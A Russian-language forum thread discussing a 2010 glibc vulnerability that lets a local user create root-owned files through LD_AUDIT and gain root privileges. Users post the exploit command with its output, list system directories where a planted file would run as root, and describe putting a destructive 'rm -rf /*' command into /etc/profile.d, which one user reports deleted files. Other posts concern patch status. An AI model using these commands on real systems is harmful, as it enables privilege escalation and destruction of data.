LINUX.ORG.RU
ФорумTalks

[дуршлаг]еще одна дыра в glibc


0

2

http://www.opennet.ru/opennews/art.shtml?num=28390

Спустя несколько дней после обнаружения в системной библиотеке GNU C Library (glibc) уязвимости , сообщается о нахождении еще одного метода взлома, позволяющего выполнить код с привилегиями суперпользователя. В отличие от ранее представленной техники, новый метод эксплуатации проявляется не только в RHEL, Fedora и CentOS, но и в Debian/Ubuntu и других Linux-дистрибутивах, использующих glibc 2.4 или более позднюю версию. Отдельно собщается , что проблеме не подвержена glibc из состава OpenWall и ALT Linux, так как в данных дистрибутивах изначально по умолчанию использован повышающий безопасность патч «sanitize-env».

[догоняющие поезд ] HP Slate
[Бред] Прикрутить V8 к огнелису
1 2
Ответ на: комментарий от GotF

> ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root gotf 4 2010-10-23 20:24 /etc/cron.d/exploit


все сработало, дыра в наличии, файлы от root создаются,
просто крон не выполняет, есть куча других способов сделать бяку



: в /etc/profile.d
: или /etc/sources.d (deb/ubuntu)
: или еще какой нибудь /etc/whatever.d/
: кинуть файлик
: можно в /etc/ld.so.conf.d/ даже
: вообщем креативь на здоровье)

тут уже предлагали rm -rf /* вставить в /etc/profile.d/whatever

Sylvia ★★★★★
()
Ответ на: комментарий от GotF

в сквизе уже пропатчили,
в сиде версия та же (2.11.2-6), так что можно ставить с сквиза пока, в сиде Аурелиен будет новый патчсет делать, ждать его не стоит пока

Sylvia ★★★★★
()
Ответ на: комментарий от Sylvia

Да ладно, для компьютера, который недоступен как по сети, так и локально, это не должно быть проблемой (=

GotF ★★★★★
()
Ответ на: комментарий от Sylvia

> тут уже предлагали rm -rf /* вставить в /etc/profile.d/whatever

Попробовал-првоерил, неприятно получилось. От юзера на права ругается, от рута и при старте системы выполняет...

vvn_black ★★★★★
()
Ответ на: комментарий от AX

сотрет только первый сектор, точнее первые несколько байт , неприятно конечно , но не фатально

Sylvia ★★★★★
()

Решето?!

Не работает. 

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
$ ls /etc/cron.d/
anacron

или второй вариант

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/test" ping
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
$ ls /etc/test
ls: невозможно получить доступ к /etc/test: Нет такого файла или каталога

ЧЯДНТ?

Ubuntu 10.10

daemon73 ★★
()
Ответ на: комментарий от daemon73

ну вот и не надо жаловаться потом, что эксплоиты не работают )

Sylvia ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2
[догоняющие поезд ] HP Slate
Talks
[Бред] Прикрутить V8 к огнелису